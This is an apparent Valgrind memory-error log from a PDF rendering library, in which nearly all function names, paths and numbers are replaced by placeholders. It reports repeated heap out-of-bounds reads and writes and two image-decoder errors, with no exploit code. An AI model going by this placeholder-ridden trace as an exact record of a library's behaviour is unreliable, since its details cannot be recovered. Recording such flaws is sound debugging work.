int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad white code NUMBERTAG b) in APITAG stream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Error NUMBERTAG APITAG row is wrong length NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C4C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CBF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) 